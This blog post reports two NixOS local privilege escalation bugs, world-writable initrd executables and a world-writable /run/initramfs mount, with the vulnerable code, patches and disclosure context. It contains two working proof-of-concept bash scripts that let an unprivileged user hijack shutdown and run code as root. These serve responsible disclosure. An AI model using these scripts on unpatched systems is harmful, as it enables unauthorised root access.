Stumbling upon a pair of LPEs in NixOS

9 minute read Published: 2025-04-13

Preface

I recently discovered a pair of local privilege escalation vulnerabilities in NixOS.
This blog post explains how I found them.

See the following links for more information about the vulnerabilities themselves:

Background

I discovered the first vulnerability by accident, while I was trying to create my first "real" NixOS configuration for my home server.

Taking inspiration from tmpfs as root, I set out to harden my configuration as best I could. That meant no needless persistent state, nothing writable that doesn't need to be, etc.

As I was still learning NixOS (and the Nix ecosystem), I made a lot of mistakes and ran into a lot of errors.
Some of these errors prevented the system from booting properly (incorrect mounts), while others prevented me from logging in (broken /etc/{passwd,shadow}).

So I booted up my work-in-progress NixOS configuration in QEMU for the nth time, half-expecting it not to work properly due to my previous tinkering.
Instead, I was able to successfully login, and systemctl reported zero failing units.

A Foreboding Warning

Just in case, I checked journalctl -b0 and skimmed through the early boot logs, where a certain warning showed up:

'/nix/store/b2cfj7yk3wfg1jdwjzim7306hvsc5gnl-systemd-257.3/lib/systemd/system-generators/systemd-debug-generator' is marked world-writable, which is a security risk as it is executed with privileges. Please remove world writability permission bits. Proceeding anyway.
'/nix/store/b2cfj7yk3wfg1jdwjzim7306hvsc5gnl-systemd-257.3/lib/systemd/system-generators/systemd-fstab-generator' is marked world-writable, which is a security risk as it is executed with privileges. Please remove world writability permission bits. Proceeding anyway.
'/nix/store/b2cfj7yk3wfg1jdwjzim7306hvsc5gnl-systemd-257.3/lib/systemd/system-generators/systemd-gpt-auto-generator' is marked world-writable, which is a security risk as it is executed with privileges. Please remove world writability permission bits. Proceeding anyway.
'/nix/store/b2cfj7yk3wfg1jdwjzim7306hvsc5gnl-systemd-257.3/lib/systemd/system-generators/systemd-hibernate-resume-generator' is marked world-writable, which is a security risk as it is executed with privileges. Please remove world writability permission bits. Proceeding anyway.
'/nix/store/b2cfj7yk3wfg1jdwjzim7306hvsc5gnl-systemd-257.3/lib/systemd/system-generators/systemd-run-generator' is marked world-writable, which is a security risk as it is executed with privileges. Please remove world writability permission bits. Proceeding anyway.
'/nix/store/b2cfj7yk3wfg1jdwjzim7306hvsc5gnl-systemd-257.3/lib/systemd/system-generators/systemd-tpm2-generator' is marked world-writable, which is a security risk as it is executed with privileges. Please remove world writability permission bits. Proceeding anyway.

These messages are from systemd, complaining that some executables it calls are world-writable.

I thought that was strange - I hadn't made any changes to the initrd, besides enabling systemd: boot.initrd.systemd.enable = true.

So I decided to investigate. First, I looked at the initrd itself.

NixOS conveniently makes this possible without even applying the configuration (so long as you remember the long attribute path):

$ nix build .#nixosConfigurations.default.config.system.build.initialRamdisk.out

Now we can inspect result/initrd:

$ zstd -d < result/initrd | cpio -t --verbose | rg '^\-rwxrwxrwx' --count
176

Sure enough, the initrd has 176 files that are world-writable, and looking through the file list (remove --count), it seemed to include a lot of important executables.

Finding the Culprit

At this point, it's clear that the initrd has some very broken file permissions.
I just needed to figure out why.

After some ripgrep-ing around in nixpkgs, I found a suspect:

$ rg perm pkgs/build-support/kernel/
pkgs/build-support/kernel/make-initrd-ng/src/main.rs
191:        let mut permissions = fs::metadata(&target)
193:            .permissions();
194:        permissions.set_readonly(false);
195:        fs::set_permissions(&target, permissions)

Let's take a closer look at that file:

if let Ok(Object::Elf(e)) = Object::parse(&contents) {
    add_dependencies(source, e, &contents, &dlopen, queue)?;

    // Make file writable to strip it
    let mut permissions = fs::metadata(&target)
        .wrap_err_with(|| format!("failed to get metadata for {:?}", target))?
        .permissions();
    permissions.set_readonly(false);
    fs::set_permissions(&target, permissions)
        .wrap_err_with(|| format!("failed to set readonly flag to false for {:?}", target))?;

    // Strip further than normal
    if let Ok(strip) = env::var("STRIP") {
        if !Command::new(strip)
            .arg("--strip-all")
            .arg(OsStr::new(&target))
            .output()?
            .status
            .success()
        {
            println!("{:?} was not successfully stripped.", OsStr::new(&target));
        }
    }
};

Immediately, we can see an obvious problem: the original permissions are never restored after making the file writable.

But there's a bigger problem:

    permissions.set_readonly(false);

This line is equivalent to chmod a+w <file>, making each ELF world-writable.

Thus, the bug lies in the NixOS-specific make-initrd-ng tool, which is called to generate the contents of the initrd image.

Patch Time

At this point, it was clear to me that I found a bug in NixOS, so I drafted a patch to fix the issue:

diff --git a/pkgs/build-support/kernel/make-initrd-ng/src/main.rs b/pkgs/build-support/kernel/make-initrd-ng/src/main.rs
index 934c2faebed8..0187931e3019 100644
--- a/pkgs/build-support/kernel/make-initrd-ng/src/main.rs
+++ b/pkgs/build-support/kernel/make-initrd-ng/src/main.rs
@@ -188,12 +188,11 @@ fn copy_file<
         add_dependencies(source, e, &contents, &dlopen, queue)?;
 
         // Make file writable to strip it
-        let mut permissions = fs::metadata(&target)
+        let original_permissions = fs::metadata(&target)
             .wrap_err_with(|| format!("failed to get metadata for {:?}", target))?
             .permissions();
-        permissions.set_readonly(false);
-        fs::set_permissions(&target, permissions)
-            .wrap_err_with(|| format!("failed to set readonly flag to false for {:?}", target))?;
+        fs::set_permissions(&target, unix::fs::PermissionsExt::from_mode(0o600))
+            .wrap_err_with(|| format!("failed to set read-write permissions for {:?}", target))?;
 
         // Strip further than normal
         if let Ok(strip) = env::var("STRIP") {
@@ -207,6 +206,10 @@ fn copy_file<
                 println!("{:?} was not successfully stripped.", OsStr::new(&target));
             }
         }
+
+        // Restore original permissions
+        fs::set_permissions(&target, original_permissions)
+            .wrap_err_with(|| format!("failed to restore permissions for {:?}", target))?;
     };
 
     Ok(())

Performing the same test as before, we can check whether the fix worked:

$ nix build .#nixosConfigurations.default.config.system.build.initialRamdisk.out
$ zstd -d < result/initrd | cpio -t --verbose | rg '^\-rwxrwxrwx' --count
0

Much better.

I thought about submitting a public PR, under the assumption that world-writable initrd files don't really constitute a security vulnerability for most configurations (most processes run as root during early boot anyway).
Additionally, boot.initrd.systemd.enable is not enabled by default, so only those who explicitly enabled it would be affected (or so I thought).

However, I had recently read systemd's bootup man page, which gave me an idea...

An Exploit?

Systemd supports the usage of an "exitrd" (excerpt from man bootup):

When the system manager is shutting down and /run/initramfs/shutdown exists, it will switch root to /run/initramfs/ and execute /shutdown. This program runs from the tmpfs mounted on /run/, so it can unmount the old root file system and perform additional steps, for example dismantle complex storage or perform additional logging about the shutdown.

If the exitrd is generated with make-initrd-ng as well, we might have an exploitable vulnerability on our hands.

First, let's figure out the name of the make-initrd-ng package (or packages, rather):

$ rg make-initrd-ng pkgs/top-level/
pkgs/top-level/all-packages.nix
671:  makeInitrdNG = callPackage ../build-support/kernel/make-initrd-ng.nix;
672:  makeInitrdNGTool = callPackage ../build-support/kernel/make-initrd-ng-tool.nix { };

Now let's search for them in the nixos directory:

$ rg makeInitrdNG nixos/
nixos/modules/system/boot/systemd/shutdown.nix
74:        ExecStart = "${pkgs.makeInitrdNGTool}/bin/make-initrd-ng ${ramfsContents} /run/initramfs";
[...]

That sure sounds like a match; let's take a look:

{
  # [...]
  systemd.services.generate-shutdown-ramfs = {
    description = "Generate shutdown ramfs";
    wantedBy = [ "shutdown.target" ];
    before = [ "shutdown.target" ];
    unitConfig = {
      DefaultDependencies = false;
      RequiresMountsFor = "/run/initramfs";
      ConditionFileIsExecutable = [
        "!/run/initramfs/shutdown"
      ];
    };
  
    serviceConfig = {
      Type = "oneshot";
      ProtectSystem = "strict";
      ReadWritePaths = "/run/initramfs";
      ExecStart = "${pkgs.makeInitrdNGTool}/bin/make-initrd-ng ${ramfsContents} /run/initramfs";
    };
  };
}

... yeah, let's not submit that PR for now.

This service definition implies that make-initrd-ng is called to populate the exitrd (/run/initramfs) during shutdown.

So if an attacker can run their code after generate-shutdown-ramfs.service, they can simply overwrite /run/initramfs/shutdown and become not just UID 0, but PID 1 as well.

Naturally, there's one good way to test that theory.

Writing an Exploit

First, we'll need to prevent systemd from terminating our process during shutdown.
Turns out we can just ignore the signals and systemd will graciously give us at least 90 seconds to do whatever we please (YMMV if you're starting from a compromised service rather than a normal user).

We also need to resolve any Nix store paths we use in the exitrd (there's no /run/current-system to rely on).

And so, without further ado, the proof-of-concept exploit script:

#!/usr/bin/env bash

# usage: run this script via `bash poc.sh & disown` as any unprivileged user

# ignore signals to prevent systemd from killing us
trap -- '' SIGQUIT SIGHUP SIGINT SIGTERM SIGUSR1 SIGUSR2 SIGPIPE

# wait for generate-shutdown-ramfs.service to start
while [[ ! -f /run/initramfs/shutdown ]]; do
	sleep 0.1
done

# wait for generate-shutdown-ramfs.service to exit
while systemctl is-active -q generate-shutdown-ramfs.service; do
	sleep 0.1
done

# find bash for our payload
bash_path="$(find /run/initramfs/nix/store -maxdepth 1 -type d -name '*-bash-*' | head -n1)"
bash_path="${bash_path#/run/initramfs}"/bin/bash

# find coreutils for our payload
coreutils_path="$(find /run/initramfs/nix/store -maxdepth 1 -type d -name '*-coreutils-*' | head -n1)"
coreutils_path="${coreutils_path#/run/initramfs}"/bin

# read systemd-shutdown path
target="$(readlink -n /run/initramfs/shutdown)"

# overwrite systemd-shutdown executable with our payload
cat <<EOF > /run/initramfs/"$target"
#!${bash_path}

export PATH="\$PATH:${coreutils_path}"

# uncomment to send output to serial console
#exec >/dev/ttyS0

# show our banner
echo "!!! systemd-shutdown takeover successful: \$(id) !!!"

echo "sleeping for 15 seconds..."
sleep 15

# kernel panic by exiting from PID 1
exit
EOF

Running this script as an unprivileged user via bash poc.sh & disown (logged in physically or via SSH), and performing any form of shutdown (poweroff, reboot, kexec) will result in the banner being printed to the virtual terminal.

The True Scope

Earlier, I mentioned that boot.initrd.systemd.enable has to be enabled for this vulnerability to be exploitable.
Unfortunately, this is not true, because the exitrd is controlled separately by systemd.shutdownRamfs.enable, which is enabled by default!

So this vulnerability actually affects all standard NixOS configurations, dating back to mid-2022 (since nixpkgs commit e5995b22353d003cf2c3b32143ff996b14cbbb62, when the bug was introduced).

Aftermath

Once I successfully proved to myself that this issue really was exploitable, I began writing a report to disclose the issue to the NixOS security team.

Buy One Vulnerability, Get One Free

After submitting the first vulnerability report, I decided I should look into another odd detail I noticed: /run/initramfs had rwxrwxrwt permissions (mode 1777).

These are the default permissions for tmpfs mounts, and /tmp directories on most distros use these permissions.
The "sticky bit" ensures that, once a file or subdirectory is created under the mount point, only the owner of a file can rename or delete it.

This means that an attacker cannot simply delete and replace /run/initramfs/shutdown with their own file.
However, it does open up a possible attack vector: what if we create the file before make-initrd-ng runs?

Another Exploit

Directly attacking /run/initramfs/shutdown again is possible, but it's rather noisy: generate-shutdown-ramfs.service either fails (because of the existing file), or gets skipped entirely if you make the file executable fast enough (due to its ConditionFileIsExecutable=!/run/initramfs/shutdown).

After some more systemd manual reading, I found an interesting feature:

Shortly before executing the actual system power-off/halt/reboot/kexec, systemd-shutdown will run all executables in /usr/lib/systemd/system-shutdown/ [...]

Helpfully, NixOS patches systemd-shutdown to use /etc/systemd/system-shutdown (otherwise we'd need to use a Nix store path).
So with a bit of luck, we can create the etc directory before make-initrd-ng does, and get root without showing up in the system logs.

#!/usr/bin/env bash

# usage: run this script via `bash poc.sh & disown` as any unprivileged user

# ignore signals to prevent systemd from killing us
trap -- '' SIGQUIT SIGHUP SIGINT SIGTERM SIGUSR1 SIGUSR2 SIGPIPE

# find and read shutdown-ramfs-contents.json
contents_json="$(<$(grep -oE '(/nix/store/[^ ]+shutdown-ramfs-contents\.json)' /etc/systemd/system/generate-shutdown-ramfs.service))"
# extract the store paths we need
bash_path="$(echo "$contents_json" | grep '/nix/store/[^"]*bash' -o)"
coreutils_path="$(echo "$contents_json" | grep '/nix/store/[^"]*coreutils-[^"]*/bin' -o)"

# wait for run-initramfs.mount to create the directory
while [[ ! -d /run/initramfs ]]; do
	:
done

# race time: beat make-initrd-ng to creating /run/initramfs/etc
# (repeated because run-initramfs.mount hasn't finished yet)
while [[ ! -d /run/initramfs/etc ]]; do
	mkdir /run/initramfs/etc >/dev/null
done

# we (hopefully) now own /run/initramfs/etc

# insert payload into exitrd
install -Dm755 /dev/stdin /run/initramfs/etc/systemd/system-shutdown/exploit.sh <<EOF
#!${bash_path}

# we are now running as UID 0

export PATH="\$PATH:${coreutils_path}"

# render banner
banner="!!! systemd-shutdown takeover successful: PID=\$\$ \$(id) !!!"

# read /proc/mounts
mount_info="\$(</proc/mounts)"

# show our banner to all TTYs
for dev in /dev/tty*; do
	echo "\$banner (dev=\$dev)" > "\$dev"
	echo "\$mount_info" > "\$dev"
done

# sleep for a bit before continuing
sleep 15
EOF

In my limited testing, this script always beats make-initrd-ng to creating /etc.

Patch Number Two

The fix is straightforward: just change the permissions for the mountpoint.

diff --git a/nixos/modules/system/boot/systemd/shutdown.nix b/nixos/modules/system/boot/systemd/shutdown.nix
index 1e8b8c6f863c..a839566af35c 100644
--- a/nixos/modules/system/boot/systemd/shutdown.nix
+++ b/nixos/modules/system/boot/systemd/shutdown.nix
@@ -52,6 +52,7 @@ in
         what = "tmpfs";
         where = "/run/initramfs";
         type = "tmpfs";
+        options = "mode=0755";
       }
     ];

After testing the fix, I submitted my second report as a follow-up.

Conclusion

At 2025-04-13 16:00 (UTC), the nixpkgs advisory was made public, along with the PRs containing the security fixes (#398396 and #398397).

Unfortunately, security updates can take a long time to make their way to users:

To be fair, this delay has been exacerbated by a coincidental Perl security fix, which required rebuilding a large part of nixpkgs (a "mass rebuild").

How best to improve the situation seems to be an open question:

As a newcomer to NixOS, I won't pretend to know what the right solution is, but this limitation is worth keeping in mind when using NixOS in security-sensitive contexts.

Timeline

Finally, for transparency's sake, here is my timeline of events (UTC):